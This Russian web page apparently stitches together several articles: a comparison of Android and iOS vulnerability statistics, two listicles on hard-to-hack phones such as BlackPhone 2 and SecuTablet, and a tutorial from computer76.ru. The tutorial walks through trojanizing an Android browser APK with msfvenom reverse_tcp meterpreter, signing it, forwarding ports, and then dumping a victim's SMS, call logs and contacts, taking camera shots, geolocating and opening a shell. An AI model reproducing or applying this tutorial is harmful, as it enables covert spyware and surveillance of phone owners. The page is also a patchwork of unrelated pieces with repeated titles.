+7(499)-938-42-58 Москва
+7(800)-333-37-98 Горячая линия

4 смартфона и планшета, которые сложнее всего взломать

Содержание

Почему Android может быть безопаснее iOS. Объясняет русский Хакер

4 смартфона и планшета, которые сложнее всего взломать

Известно, что iPhone сложнее взломать, чем среднестатистический смартфон на Android. Поэтому принято считать, что iOS автоматически защищена лучше, чем операционная система Google. На самом деле, все с точностью наоборот.

Предыстория: iOS – один, а Android – великое множество

Нет, никто не сошел с ума. Но один из авторов «Хакера», Евгений Зобнин, попробовал составить численную статистику и разобраться с известными уязвимостями. По-русски: сначала посчитал все «дырки» в системах, которые позволяют получить доступ к данным пользователя.

А потом выкинул из них все те, которые не относятся к Android.

Как не относятся к Android? Почему iOS – дырявое ведро, ведь доказано обратное? Все оказывается очень просто.

Когда мы говорим «iPhone», мы подразумеваем целую экосистему, включающую сам смартфон, операционную систему, сервера Apple и команды разработчиков. Когда мы говорим «смартфон на Android», мы тоже представляем себе целую цепочку.

Команда Apple одна. Оболочка – тоже одна. Проблемы тоже распространяются на все устройства. Как и отсутствие «дырок в системе».

С Android все хуже.

Каждая мало-мальски «серьезная» компания не только адаптирует общедоступные драйвера, но и калечит операционную систему: вносит дополнительные функции, собственные оболочки, дорабатывает системные приложения и добавляет кучу программного мусора.

Поэтому таких цепочек, какие мы представляем при слове «iPhone» – великое множество. Конечно, не отдельная для каждой модели смартфона, и даже не отдельная для каждой компании. Но как минимум своя собственная у каждого крупного бренда.

А еще смартфоны под управлением Android используют процессоры 2 крупных разработчиков (если рассматривать планшеты – все еще 3): MediaTek и Qualcomm. Каждая из компаний, производящих процессоры (точнее, однокристальные платформы, SoC), выпускает собственные драйвера. Аналогично – производители модулей в составе смартфона.

У Apple – 1 команда разработки и доработки. У Android их огромное число. Проблемы вносит и исправляет каждая, часто отдельно от других.

Рут и джейлбрейк: два названия одной проблемы

Как поясняет Евгений, для анализа статистики уязвимостей каждой из мобильных операционных систем стоит рассмотреть джейлбрейк – получение прав рут. Сколько требуется времени, чтобы получить рут на iPhone? В зависимости от версии:

  • iOS 6.0 — взломана в тот же день;
  • iOS 7.0 — взломана спустя 95 дней;
  • iOS 7.1 — взломана спустя 25 дней;
  • iOS 8.0 — взломана спустя 35 дней;
  • iOS 8.1.1 — взломана спустя 12 дней;
  • iOS 9.0 — взломана спустя 28 дней;
  • iOS 9.1 — взломана спустя 142 дня;
  • iOS 10 — взломана спустя 106 дней.

Для Android все несколько хуже.

У MediaTek системный загрузчик фактически не защищен: любой пользователь или зловредная программа, установленная пользователем (и получившая при установке от него необходимые права) могут получит рут и полный контроль над операционной системой в несколько касаний. У операционных систем для аппаратов на базе процессоров Qualcomm для этого требуется немного больше времени и сил.

Впрочем, есть смартфоны, у которых разблокировать загрузчик легально нельзя. У Xiaomi, например, для этого необходимо сначала получить разрешение у компании. И только потом приступить к сложной замене фирменного защищенного загрузчика взломанным. Уже он даст доступ к системе.

Защита Android зависит от разработчика смартфона, а не операционной системы.

Статистика: когда числа врут

Если рассмотреть общую статистику уязвимостей операционных систем, благодаря которым злоумышленник (человек или программа) может получить доступ к данным или аппаратным ресурсам смартфона, iOS намного надежнее:

  • Android — 1308 уязвимостей.
  • iOS — 1275 уязвимостей.

Но если детально рассмотреть эти цифры, все становится неоднозначно. Например, среди последних уязвимостей Android как минимум 2 – вина не операционной системы, а разработчика драйверов для USB и Wi-Fi (Qualcomm).

Встречаются и ошибки непрофессиональных разработчиков китайских устройств – таких команд великое множество, и но фоне 10 смартфонов крупных брендов ошибки в программном обеспечении 100 свежих моделей «китайцев» мгновенно портят статистику.

Получается, что проблемы можно разделить на 2 категории: «дыры» в системе и ошибки в драйверах сторонних разработчиков. Евгений рассмотрел выборку из репрезентативную (правильную) 100 последних известных проблем. Для Android:

  • 29 — драйверы Qualcomm;
  • 28 — уязвимости Android;
  • 20 — ядро CAF, развиваемое Qualcomm;
  • 9 — драйверы Mediatek;
  • 7 — драйверы Broadcom;
  • 4 — уязвимости в прошивках производителей;
  • 3 — драйверы Nvidia;

И iOS:

  • 99 — уязвимости iOS;
  • 1 — драйвер Qualcomm.

Разработчики iOS в 3,5 раза чаще разработчиков Android допускают критические ошибки, приводящие к возможности заражения или потере данных.

Почему же iPhone лучше защищен, чем безымянный Android Васи?

Не смотря на статистику, баги iOS быстро исправляются. Апдейты системы получают все пользователи актуальных версий смартфонов, без исключения. У Android-смартфонов печальнее: только некоторые бренды уделяют должное внимание своевременному обновлению своих прошивок.

Самое неприятное, что крупные компании «забывают» обновлять свои устройства даже чаще, чем «китайцы». Еще на памяти ситуация с LG и Sony, отказывавшим в обновлении устройствам моложе года.

Могу ошибаться, но стабильные обновления выпускает только Google (включая партнерские смартфоны проекта Android One), Samsung, OnePlus и Xiaomi. Причем последняя «штопает дыры» еженедельно, даже не спрашивая покупателя – нужно ли.

Ошибки в Android могут распространяться с устаревшей системой 2-3 года. Ошибки в iOS просто исчезают после выпуска новой версии. Если бы не это, покупатели смартфонов Apple были бы жутко разочарованы – компания допускает очень много критических ошибок.

Хочу защищенный смартфон. Что выбрать?

Cамая надежная защита – купить смартфон бренда, уделяющего достаточное внимание обновлениям операционной системы.

  • Лучше всего – Google Nexus, Pixel или смартфон проекта Android One. Все они работают под управлением чистого Android, обладают наименьшим числом программных багов и получают обновления системы в течении 3 лет.
  • Среди остальных брендов доверие вызывают Samsung, Xiaomi, OnePlus. Xiaomi критические апдейты и свежие версии ОС для всего модельного ряда, не забывая даже свой первый массовый смартфон.
  • Если ни один из вариантов невозможен, нужно выбирать смартфон, для которого существует официальная версия LineageOS. Она обновляется на всех поддерживаемых устройствах и спасет в том случае, если производитель «забьет».
  • Купить iPhone. Какие бы проблемы не нашлись – Apple закроет дыры для злоумышленников в течении 2 недель.

поста:

(5.00 из 5, оценили: 1)

Источник: https://www.iphones.ru/iNotes/745460

Как взломать смартфон под управлением Андроид? – Компьютер76

4 смартфона и планшета, которые сложнее всего взломать

Компьютер76 » Андроид » Как взломать смартфон?

31.05.2021

Как взломать смартфон?

В статье описывается процесс, с помощью которого хакер может взломать смартфон жертвы, используя набор простых инструментов операционной системы Кали Линукс.

И сегодня разберём один из способов того, как злоумышленник может взломать смартфон, находящийся под управлением операционной системы Андроид.

Причём благодаря автоматизации некоторых процессов и при должной сноровке этот процесс можно поставить прямо-таки на поток.

Как взломать смартфон: лаборатория хакера

  • Компьютер под управлением Кали Линукс Rolling
  • Смартфон под управлением Андроид
  • Невнимательный пользователь

Что хакер сможет сделать?

С помощью этого способа злоумышленник получит возможность:

  • читать смс
  • номера набранных телефонов
  • включать камеры устройства и просматривать видео в режиме он-лайн
  • определять текущее местоположение с большой точностью (в случае, если жертва использует Wi-Fi для выхода в сеть)
  • управлять устройством с помощью shell-команд (копировать, создавать и удалять файлы)

Как взломать смартфон: этапы взлома

Весь процесс разбивается на несколько этапов:

  • выбор оригинального приложения-жертвы
  • генерация пэйлоуда — декомпиляция двух файлов (созданного пэйлоуда и оригинального приложения .apk) — инжектирование файлов пэйлоуда в приложение — инжектирование специальных возможностей пэйлоуда и необходимых для этого разрешений для полноценной работы метерпретера
  • размещение заражённого приложения и удалённая с ним работа

Как видите самый смак лежит во втором, самом объёмном пункте. Дело в том, что всё описанное в нём можно проделать с помощью инструментария Метасплойт единственной командой через msfvenom, а можно — вручную. Она — команда — появится чуть ниже, а пока детали подготовки и объяснение флагов.

Выбираем приложение

Перед тем, как начать, хакеру необходимо определиться с искомым приложением, которое он будет заражать для последующей «раздачи». Дело здесь не столько в популярности выбираемого, сколько в УЖЕ ИМЕЮЩИХСЯ возможностях и разрешениях этой программы.

Давая разрешение на установку программы на свой смартфон, пользователи всё чаще обращают внимание именно на действия, которые приложение будет осуществлять.

Согласитесь, если программки для игры в шахматы или читалка кодов ошибок автомобилей будет иметь доступ к настройкам звонков и СМС, а также к камере смартфона, это насторожит любого внимательного пользователя.

Однако такое поведение очень даже характерно для другого рода утилит, в том числе системных. Речь идёт о всякого рода чистильщиках, ремонтных утилитах и, конечно, мобильных браузерах и мессенджерах. Скорее всего, хакер обратит свой взор именно в эту степь.

Я для примера возьму набирающий популярность мобильный браузер Mercury (у него есть дурацкая особенность — он сидит в автозагрузке и запускается вместе с включением устройства, а хакеру это только на руку), предварительно скачав его apk модуль установщика.

Он называется ilegendsoft.mercury.apk.

Как взломать смартфон: генерация пэйлоуда

команда, которая и создаст троянский код:

msfvenom -a dalvik –platform android -p android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -x донор.apk -o заражённый.apk

-a dalvik — platform android — целью является платформа Андроид c архитектурой dalvik

Тип пэйлоуда. Обычно подбирается один из трёх типов пэйлоуда, которые по своему функционалу, в принципе, схожи. И все они входят в состав инструментария метерпретер из набора Метасплойт. Единственное их отличие — способ соединения с системой хакера. И выбирать будем из маленького списка:

  • reverse_tcp
  • reverse_https
  • reverse_http

IP адрес хакера. Если выбудете тренироваться на виртуальных площадках лаборатории, то есть смысл указать в качестве адреса локальный IP.

У меня в статье будут фигурировать оба: локальный и глобальный адреса, так что вам лишь стоит набрать в Google команду what is my ip. IP адрес в локальной сети вам подскажет команда ifconfig.

Оба адреса нам понадобятся, советую с этим моментом сразу определиться.

Порт. Выбираем любой, кроме реверсивных (80, например, не прокатит). Для работы в глобальной сети сразу необходимо позаботиться о пробросе портов. В статье о настройке троянской программы Dark Comet я пробросил с этой целью 1555 порт.

Им и воспользуюсь в обоих экспериментах. Далее, настраиваем связку роутер — компьютер в опциях dst-nat (в разделе Переадресация портов в службе HTTP добавьте локальный адрес компьютера (из ответа на команду ifconfig в терминале Кали) в формате 192.168.Х.

Х — всё зависит от версии вашего роутера):

IP-роутера:1555 -> 192.168.Х.Х:1555

по схеме:

Внешний IP (ХХХ.ХХХ.ХХХ.ХХХ):1555 -> Роутер -> Внутренний (192.168.Х.Х) IP:1555 -> Компьютер_хакера.

Донор. Как уже указал, это браузер Меркурий (Mercury) ilegendsoft.mercury.apk.

Заражённый. В качестве имени будет фигурировать именно то имя, которое жертве будет подсовываться в качестве реального. Так что вопрос с наименованием также следует продумать заранее. У меня он называется payload.apk.

Далее. В Кали Линукс для работы нам не хватает одной маленькой библиотечки. Её и скачаем:
apt-get install zipalign

Итак, команда создания троянского приложения в моём случае принимает вид, в котором я и запускаю в терминале из директории с оригинальным apk:

msfvenom -a dalvik –platform android -p android/meterpreter/reverse_tcp LHOST=глобальный-IP-адрес LPORT=1555 -x ilegendsoft.mercury.apk -o payload.apk

Готово. Результат вы можете увидеть в той же папке:

Чтобы приложение смогло установиться и запуститься, нам нужно задать ему подпись. И сначала сгенерируем хранилище ключей:

keytool -genkey -v -keystore trojan.keystore -alias trojan -keyalg RSA -keysize 2048 -validity 10000

Сейчас нам придётся пройти рутиную процедуру по  регистрации. Пишите, впрочем, что хотите:

сверху рисунка попались результаты работы пэйлоуда — будущему браузеру присваивались неограниченные права

А теперь и сама подпись (работаем всё в той же папке, применявшиеся ранее имена папок и фалов я выделил жирным):

jarsigner -verbose -keystore trojan.keystore -storepass 123456 -keypass 123456 -digestalg SHA1 -sigalg MD5withRSA payload.apk trojan

Подпись присваивается по умолчанию сроком на 10000 дней. Хватит. Тем временем в рабочей папке появился готовый к отсылке файл. Теперь заражённое приложение (кроме имени и чуть пополневшее — ничем от оригинала не отличается) должно оказаться на смартфоне жертвы и установиться.

Как взломать смартфон: работа с троянским приложением

Антивирус при установке молчит. Установка проходит незаметно, кроме, конечно, предупреждений о непонятно откуда взявшихся непомерных желаниях браузера. Жертва включает браузер и лезет в сеть.

В это время злоумышленник ждёт урожая. Заряжаем Метасплойт (порты в роутере проброшены?):

msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.XXX.XXX set LPORT 1555run

нажмите, чтобы увеличить

Запущена текущая сессия метерпретера. Теперь остаётся вспомнить или изучить основные команды метера и команды shell под Андроид. Что-то можно выудить прямо сейчас. Наберите в строке метерпретера:

help

и вы увидите быстрые команды. Что здесь есть:

Что хоть взломали-то такое:

sysinfo

Проверим список sms-сок:

meterpreter > dump_sms [*] Fetching 611 sms messages [*] SMS messages saved to: sms_dump_20210531121028.txt

Проверим список звонков ( на выходе вы увидите путь calllog_dump_20210531121133.txt — документ в папке root):

meterpreter > dump_calllog [*] Fetching 500 entries [*] Call log saved to calllog_dump_20210531121133.txt

Телефонные номера в книжке:

meterpreter > dump_contacts [*] Fetching 75 contacts into list [*] Contacts list saved to: contacts_dump_20210531122443.txt

Логи будут представлены в виде текстовых файлов:

Рутирован ли смартфон:

meterpreter > check_root [*] Device is not rooted

Сколько есть камер:

meterpreter > webcam_list 1: Back Camera 2: Front Camera

Фото на память (камеры можно выбирать):

meterpreter > webcam_snap [*] Starting… [+] Got frame [*] Stopped Webcam shot saved to: /root/olutbmJh.jpeg

Запишем видео на память:

webcam_streamНа некоторых смартфонах пэйлоуд сам активирует геолокацию, у некоторых пользователей она всегда включена. Проверьте, где он сейчас находится — повезёт-не повезёт (один из моих заражённых смартфонов, работающих через Wi-Fi, определился с точностью до адреса дома):
wlan_geolocate

Наконец, для управления смартфоном наберём:

shell

Есть доступ к командной строке Андроида.

Превентивные меры или как не попасться на удочку

Из написанного понятны слабые места для тех, кто захочет вас отработать.

  • приложение должно попасть на смартфон и установиться. А значит, есть смысл не оставлять его где попало без присмотра. Иначе любое ваше любимое приложение будет работать против вас же
  • качаем приложения только из двух источников: разработчики и Google Play (там тоже много чего нехорошего замечено, но Google пытается контролировать ситуацию)
  • читайте, что собирается делать устанавливаемое приложение. Если требований к доступу очень уж много, стоит отказаться. Бесплатный сыр, знаете ли… он такой.

Успехов вам.

Источник: https://computer76.ru/2021/05/31/vzlomat-smartfon/

Смартфоны и планшеты, которые невозможно взломать

4 смартфона и планшета, которые сложнее всего взломать

Сегодня опасность обращения с гаджетам состоит не только в том, что его могут украсть, но и в том, что он хранит много личной и рабочей конфиденциальной информации, кража которой, порой, может иметь серьезные последствия. Поэтому если в вашем смартфоне или планшете много важной информации, личной или рабочей переписки, файлов, номеров платежных карт и т.

д., то стоит позаботиться о том, чтобы выбрать гаджет с максимальным уровнем защиты от взломов, утечки данных и т.д. Естественно, с каждым днем злоумышленники находят все новые уязвимости и способы добыть нужную информацию, а современный рынок весьма скудный на устройства с подобной защитой. Поэтому предлагаем вам ознакомиться с несколькими лучшими гаджетами.

BlackPhone 2

Компания Silent Circle обратила внимание на растущее количество хакерских атак и решила выпустить смартфон, максимально защищенный от них. Теперь свет увидела вторая обновленная версия с операционной системой Private OS, которая является специфической модификацией Android.

Особенность данной оболочки состоит в том, что она позволяет создавать в телефоне несколько пространств с разным уровнем доступа к данным, поэтому можно без проблем использовать обычные приложения – они не смогут воспользоваться информацией, которую пользователь отметил как конфиденциальную.

При покупке смартфон снабжен пакетом приложений Silent Suite с собственным браузером и мессенджером. Основная функция – шифровать ой трафик, защищать контакты пользователя, его сообщения и историю активности в интернете. Дополнительно из магазина приложений можно скачать и другой софт.

С технической точки зрения гаджет вышел прогрессивным: Full HD экран в 5,5 дюймов, 8-ядерный процессор, 3 Гб оперативной и 32 Гб основной памяти. Появится модель в продаже уже в июне с ценой в 650 долларов.

Samsung Galaxy S6

Долгожданная новинка этого года от Samsung также попала в наш список. Смартфон снабжен аппаратной платформой безопасности Knox, которая защищает данные пользователя и всю систему от хакерских атак.

С ее помощью можно также оградить определенные данные от запускаемых приложений.

Гаджет отлично подойдет для корпоративных клиентов и защиты рабочей информации, но и в личных целях его также хорошо использовать.

Не забываем и про встроенный в центральную клавишу сенсор, который можно использовать не только для разблокировки и входа в учетную запись, но и для контроля доступа к определенным программа или файлам.

Все остальные характеристики отвечают флагманскому смартфону 2015 года: дисплей диагональю 5,1 дюйм и с разрешением 2560*1440 точек, 8-ядерный процессор, 3 Гб оперативной памяти. Гаджет появится уже в апреле этого года, а цена на версию с 32 Гб (минимальный объем памяти) будет стоить около 50 000 рублей.

BlackBerry Classic

Смартфоны от BlackBerry всегда славились надежной защитой, хоть они потихоньку и вытесняются с рынка конкурентами.

Совсем скоро должна выйти версия с большим сенсорным экраном, а пока стоит обратить внимание на BlackBerry Classic.

Гаджет хорошо подходит бизнес-пользователям, поскольку может быть интегрирован в корпоративную информационную инфраструктуру. Он позволяет шифровать все данные, которые пользователь передает по почте или в сообщениях.

В остальном характеристики смартфона не самые передовые, но с учетом аппаратной платформы гаджет работает быстро. Он оснащен процессором с частотой 1,5 ГГц и 2 Гб оперативной памяти. Экран с диагональю 3,5 дюйма, под ним расположена полноценная qwerty-клавиатура.

Устройство намного доступнее предложенных выше вариантов, и может стать вашим уже за 27 тысяч рублей.

SecuTablet

Для создания этого планшета работали сразу несколько передовых компаний: Samsung, BlackBerry и IBM, задача которых состояла в разработке компактного компьютера для государственных и корпоративных нужд.

Фактически перед нами планшет Samsung Galaxy Tab S 10.5, но разработанный с использованием самых продвинутых алгоритмов для защиты от хакерских атак. Так, он получил фирменную систему Knox, память с криптографической защитой и оболочку, которая делает возможным скрыть некоторые данные от приложений и внешнего вмешательства.

Планшет использует 8-ядерный процессор, 3 Гб оперативной памяти, оснащен огромным экраном с разрешением 2560*1600 точек.

Так как гаджет предназначен для коммерческого использования, то и цена соответствующая – более 2000 долларов.

Загрузка…

Источник: http://gooosha.ru/smartfony-i-planshety-kotorye-nevozmozhno-vzlomat/

4 смартфона и планшета, которые сложнее всего взломать

4 смартфона и планшета, которые сложнее всего взломать

Мы отобрали три смартфона и один планшет, которые лучше всего справляются с защитой данных пользователя.

Каждый пользователь мобильной техники сталкивается с опасностью кражи его персональной информации.

Пользуясь уязвимостями в системе, злоумышленники могут получить доступ к личной и рабочей переписке, фотографиям, файлам и даже банковским картам, если устройство использовалось для оплаты покупок.

Для тех, кому важно предотвратить несанкционированный доступ к своим данным, iBusiness представляет обзор самой криптостойкой мобильной техники.

BlackPhone 2 — смартфон для секретов

В последнее время новости об уязвимостях в популярных мобильных системах и различных интернет-сервисах появляются с завидной регулярностью.

Поэтому неудивительно, что на рынок начали выходить устройства, разработчики которых делают акцент именно на защите от взлома и хакерских атак.

Одним из первых успешных примеров такой техники стал смартфон BlackPhone от компании Silent Circle, недавно получивший обновленную и улучшенную вторую версию.

BlackPhone 2 оснащен пакетом приложений для защищенных звонков и переписки

BlackPhone 2 работает на операционной системе PrivatOS, основой для которой послужил стандартный Android. Но эта оболочка была значительно доработана специалистами компании для повышения уровня безопасности.

Отличительной особенностью системы является возможность создавать в телефоне несколько виртуальных «пространств» с разным уровнем доступа к данным.

Это дает возможность работать с обычными Android-приложениями в повседневном режиме — у них не будет доступа к защищенной информации.

Для работы с конфиденциальными данными и для защищенных звонков используется пакет собственных приложений Silent Suite.

В него входит программа для шифрования ого трафика, отдельная адресная книга, мессенджер и браузер.

Другие приложения с высоким уровнем защиты данных можно скачать из фирменного магазина Silent Store — в него попадают программы, проверенные собственными специалистами компании.

По сравнению с первой версией смартфона BlackPhone 2 значительно прибавил в плане производительности. Он получил дисплей с диагональю 5,5 дюйма и Full HD разрешением, восьмиядерный чип Qualcomm Snapdragon 615 и 3 ГБ оперативной памяти. Объем внутреннего накопителя в смартфоне составляет 32 ГБ.

Продажи смартфона BlackPhone 2 должны начаться в июле этого года. Заказать телефон можно будет на сайте производителя, а его стоимость составит 650 долларов.

Samsung Galaxy S6 — безопасный флагман

Высокий уровень защиты персональных данных способны обеспечить не только специализированные устройства. При необходимости превратить в «виртуальную крепость» можно практически любой серийный смартфон на Android. Хорошо подходит для этого мобильная техника компании Samsung — например, новая флагманская модель Galaxy S6.

Samsung Galaxy S6 имеет встроенную платформу безопасности Knox и позволяет защитить данные с помощью сканера отпечатка пальца

Дело в том, что топовые смартфоны Samsung имеют встроенную аппаратную платформу безопасности Knox. Она защищает операционную систему от атак хакеров и внедрения вредоносного кода как на уровне приложений и доступа к файлам пользователя, так и на уровне архитектуры и ядра, контролируя целостность системы и процесс ее загрузки.

С помощью Knox можно распределить все приложения и файлы на смартфоне по независимым разделам, оградив конфиденциальные данные от доступа из повседневных программ.

Платформа прежде всего предназначена для использования смартфонов внутри корпоративной инфраструктуры, но повышенный уровень безопасности, который она обеспечивает, будет полезен и обычным пользователям.

Данные, хранящиеся на Samsung Galaxy S6, можно дополнительно защитить еще и с помощью дактилоскопического сенсора — сканера отпечатка пальцев, который встроен в центральную кнопку смартфона.

Стандартные варианты его использования предполагают разблокировку смартфона по отпечатку и вход в учетную запись Samsung.

Но с помощью сторонних решений сканер можно использовать для доступа к конкретным приложениям и платежным системам.

Как флагман 2015 года, Samsung Galaxy S6 имеет самую современную и производительную аппаратную начинку. Он оснащается восьмиядерным процессором Exynos 7420 и имеет 3 ГБ оперативной памяти, а постоянная память может составлять от 32 до 128 ГБ. Экран смартфона с диагональю 5,1 дюйма имеет сверхвысокое разрешение 2560 × 1440 точек.

Samsung Galaxy S6 должен появиться в России уже в апреле. Цены на смартфон, скорректированные с учетом курса доллара, составят около 50 тысяч рублей за версию с постоянной памятью в 32 ГБ.

BlackBerry Classic — бизнес-классика

Популярность мобильных телефонов BlackBerry всегда основывалась на высоком уровне безопасности данных, который они обеспечивали своим владельцам.

И хотя сейчас устройства компании вытеснены с рынка более популярными моделями на iOS и Android, по показателю защиты смартфоны BlackBerry все еще остаются в числе лидеров.

Пока на рынок не вышел самый современный смартфон компании — BlackBerry Leap с большим сенсорным экраном, российским пользователям стоит обратить внимание на классическую модель с механической qwerty-клавиатурой BlackBerry Classic.

BlackBerry Classic позволяет организовать защищенный доступ к рабочим ресурсам из любой точки

Она ориентирована на бизнес-пользователей и позволяет с легкостью включить устройство в корпоративную ИТ-инфраструктуру. Со смартфона легко обеспечить защищенный доступ к рабочей почте, внутренним сервисам и файлам. А при передаче все данные с BlackBerry Classic, включая электронную почту, сообщения в мессенджерах и отдельные файлы, могут быть защищены с помощью шифрования.

По своим техническим характеристикам BlackBerry Classic уступает топовым смартфонам на Android. Но из-за невысоких аппаратных требований системы BlackBerry OS устройство быстро работает и на относительно «старом» процессоре Qualcomm MSM8960 с тактовой частотой 1,5 ГГц и 2 ГБ оперативной памяти. Дисплей смартфона имеет диагональ 3,5 дюйма и разрешение 720 × 720 точек.

Заказать BlackBerry Classic в российских интернет-магазинах можно по цене от 27 тысяч рублей.

SecuTablet — планшет для государственных тайн

Мобильные устройства с повышенной защитой данных разрабатывают не только отдельные компании.

Так, для создания «безопасного» планшета SecuTablet свои усилия объединили сразу три технологических гиганта: компании Samsung, BlackBerry и IBM.

Результатом их сотрудничества стало создание портативного компьютера SecuTablet, предназначенного для использования в корпоративных или государственных структурах — там, где к безопасности данных предъявляются повышенные требования.

SecuTablet создан с применением защитных технологий Samsung, BlackBerry и IBM

Фактически SecuTablet является планшетом Samsung Galaxy Tab S 10.5, но дополненным специальным программным обеспечением которое превращает его в одно из самых криптостойких устройств на рынке.

Защиту и целостность операционной системы на нем обеспечивает платформа Samsung Knox, а от компании BlackBerry устройство получило постоянную память с криптографической защитой данных SecuSmart.

Также специалисты IBM разработали для планшета специальную программную оболочку, позволяющую защитить работающие приложения от внешнего вмешательства.

С точки зрения технических характеристик Samsung Galaxy Tab S 10.5 предоставляет пользователям весьма производительную аппаратную платформу. Он работает на восьмиядерном чипе Exynos 5 Octa 5420, имеет 3 ГБ оперативной памяти и внутренний накопитель объемом 16 или 32 ГБ. Экран планшета имеет высокое разрешение 2560 × 1600 точек.

Планшет предназначается прежде всего для коммерческого использования, так что цену имеет соответствующую — в розничной продаже модель можно будет приобрести за 2380 долларов. SecuTablet появится на рынке летом этого года.
BlackPhone 2Samsung Galaxy S6BlackBerry ClassicSecuTablet
ОС PrivatOS 1.1 Android 5.0 BlackBerry OS 10 Android 4.4
Процессор Qualcomm Snapdragon 615, 1,7 ГГц Exynos 7420, 2,1 ГГц Qualcomm MSM8960, 1,5 ГГц Exynos 5 Octa 5420, 1,9 ГГц
Оперативная память, ГБ 3 3 2 3
Постоянная память, ГБ 32 32&pide;64&pide;128 16 16⁄32
Экран 5,5 дюйма, 1920×1080 5,1 дюйма, 2560×1440 3,5 дюйма, 720×720 10,5 дюйма, 2560×1600
Фотокамеры, Мп 13 + 5 16 + 5 8 + 2 8 + 2,1
Аккумулятор, мАч 3060 2550 2515 7900
Габариты, мм н.д. 143,4 × 70,5 × 6,8 131 × 72,4 × 10,2 247,3 × 177,3 × 6,6
Вес, г н.д. 138 177 465
Цена, тыс. руб. прибл. 40 50 27 2380 долларов

Источник: https://otchetonline.ru/art/direktoru/46384-4-smartfona-i-plansheta-kotorye-slozhnee-vsego-vzlomat.html

Поделиться:
Нет комментариев

    Добавить комментарий

    Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.